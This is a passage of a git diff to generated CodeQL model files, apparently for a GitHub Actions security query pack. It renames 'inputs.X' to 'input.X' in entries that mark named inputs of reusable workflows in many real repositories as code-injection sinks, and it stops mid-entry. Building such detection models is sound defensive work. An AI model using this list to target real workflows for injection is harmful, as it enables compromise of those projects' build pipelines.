b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 09177714b08..9eb4c17cd3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 78243b4c6d7..860dcdcb43d 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 6e69fb89fc8..539edcd5891 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index fee19d65a09..b1b37d967e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51b58ab74f5..51691edc1f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 5a53b788312..3a14f6a879d 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 579e295213b..c7f84e83db5 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index bc8133b907c..72383be71ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 232c6abb3f3..8b05adf053e 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 8a7d3c60c45..9eec959ade3 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index a1e523d92ce..835301ecc73 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 22729c980de..9a99588239e 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index e242d38bdbe..12c370b33ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index f9c6658f5b8..0e03216fc69 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 798c6bcc37a..081378c9617 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index 687db46824a..fcd9c292901 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 8a13569af7c..19822c29fcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index 453eb862b94..d0ccde698b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 37074688f17..027da83e922 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] - - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 2e1835cadca..a914aa631c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index 924f5eb157c..d0fe6b0eff5 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 1244f76cbf1..3d3a4de2946 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 94c6c81d33e..4c58af6969d 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c5f5fc4b29d..8629f279891 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 506dd2b9fee..4a6bbd77ec9 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 4a81c585259..c22998ee52a 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", 